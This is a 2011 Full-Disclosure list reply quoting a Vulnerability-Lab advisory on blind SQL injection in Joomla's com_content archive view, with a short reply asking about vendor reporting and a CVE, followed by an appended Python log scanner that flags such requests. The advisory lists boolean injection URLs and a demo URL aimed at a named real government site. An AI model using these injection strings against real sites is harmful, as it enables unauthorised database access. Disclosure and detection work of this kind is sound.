Re: [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability



On Sat, Nov 12, 2011 at 12:35:35AM +0100, research@xxxxxxxxxxxxxxxxxxxxx wrote:
> Title:
> ======
> Joomla Component (com_content) -  Blind SQL Injection Vulnerability
> 
> 
> Date:
> =====
> 2011-11-11
> 
> 
> References:
> ===========
> http://www.vulnerability-lab.com/get_content.php?id=323
> 
> 
> VL-ID:
> =====
> 323
> 
> 
> Introduction:
> =============
> Joomla is a free and open source content management system (CMS) for 
> publishing content on
> the World Wide Web and intranets and a model–view–controller (MVC) Web 
> application framework
> that can also be used independently.
> Joomla is written in PHP, uses object-oriented programming (OOP) techniques 
> and software design
> patterns[citation needed], stores data in a MySQL database, and includes 
> features such as page
> caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, 
> search, and support
> for language internationalization.
> Joomla had been downloaded 23 million times. Between March 2007 and February 
> 2011 there had been
> more than 21 million downloads. There are over 7,400 free and commercial 
> extensions available
> from the official Joomla! Extension Directory and more available from other 
> sources
> 
> (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)
> 
> 
> Abstract:
> =========
> A vulnerability laboratory researcher discovered a Blind SQL Injection 
> vulnerability on the com_content component of the Joomla CMS.
> 
> 
> Status:
> ========
> Published
> 
> 
> Exploitation-Technique:
> =======================
> Remote
> 
> 
> Severity:
> =========
> Critical
> 
> 
> Details:
> ========
> A blind SQL Injection vulnerability was detected on the com_content component 
> of the Joomla CMS.
> The vulnerability allows an attacker (remote) to inject/execute their own SQL 
> statements on the affected application dbms.
> Successful exploitation of the vulnerability can result in compromise of the 
> affected application dbms.
> 
> Vulnerable Module(s):
>                                                         [+] com_content
> 
> 
> Proof of Concept:
> =================
> The vulnerability can be exploited by remote attackers. For demonstration or 
> reproduce ...
> 
> 1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]
> 2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--
> 3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--
> 
> 
> [x] Demo :
> 
> http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 
> or 1=0--
> 
> 
> Risk:
> =====
> The security risk of the blind SQL injection vulnerability is estimated as 
> critical.
> 
> 
> Credits:
> ========
> E.Shahmohamadi  (IRAN)
> 
> 
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without any 
> warranty. Vulnerability-Lab disclaims all warranties, 
> either expressed or implied, including the warranties of merchantability and 
> capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including direct, 
> indirect, incidental, consequential loss of business 
> profits or special damages, even if Vulnerability-Lab or its suppliers have 
> been advised of the possibility of such damages. Some 
> states do not allow the exclusion or limitation of liability for 
> consequential or incidental damages so the foregoing limitation 
> may not apply. Any modified copy or reproduction, including partially usages, 
> of this file requires authorization from Vulnerability-
> Lab. Permission to electronically redistribute this alert in its unmodified 
> form is granted. All other rights, including the use of 
> other media, are reserved by Vulnerability-Lab or its suppliers.
> 
> Copyright © 2011|Vulnerability-Lab
> 
> -- 
> Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
> Contact: admin@xxxxxxxxxxxxxxxxxxxxx or support@xxxxxxxxxxxxxxxxxxxxx

Did you report this to Joomla? Have you asked for a CVE ID?

Best regards,
Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
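
Added example, not part of the original thread or the advisory: a log check a site operator could run to find com_content archive requests whose `year` parameter is not a plain integer, which is the request pattern the quoted advisory describes. It assumes combined-format access logs and that a legitimate year is one to four digits; the function names, the `/joomla/` path and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S.*?) HTTP/[\d.]+"')
# Assumption: a legitimate archive year is one to four decimal digits.
YEAR_RE = re.compile(r"\d{1,4}")

# Constructed sample lines (documentation addresses, hypothetical /joomla/ path).
LINE = '{ip} - - [12/Nov/2011:00:41:13 +0100] "GET /joomla/index.php?{qs} HTTP/1.1" 200 512'
SAMPLE_LOG = [
    LINE.format(ip="192.0.2.10", qs="option=com_content&view=archive&year=2011"),
    LINE.format(ip="198.51.100.7", qs="option=com_content&view=archive&year=-1%20or%201=1--"),
    LINE.format(ip="198.51.100.7", qs="option=com_content&view=archive&year=-1+or+1%3D0--"),
    LINE.format(ip="192.0.2.10", qs="option=com_content&view=article&id=5"),
]


def suspicious_year(log_line):
    """Return the decoded year value if the line is a com_content archive
    request whose year parameter is not a plain integer, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_content" not in query.get("option", []):
        return None
    if "archive" not in query.get("view", []):
        return None
    for value in query.get("year", []):
        if not YEAR_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_year) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_year(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric year parameter: {value!r}")
```

A hit only shows that someone sent such a request; whether the installation is actually affected has to be confirmed against the Joomla version in use.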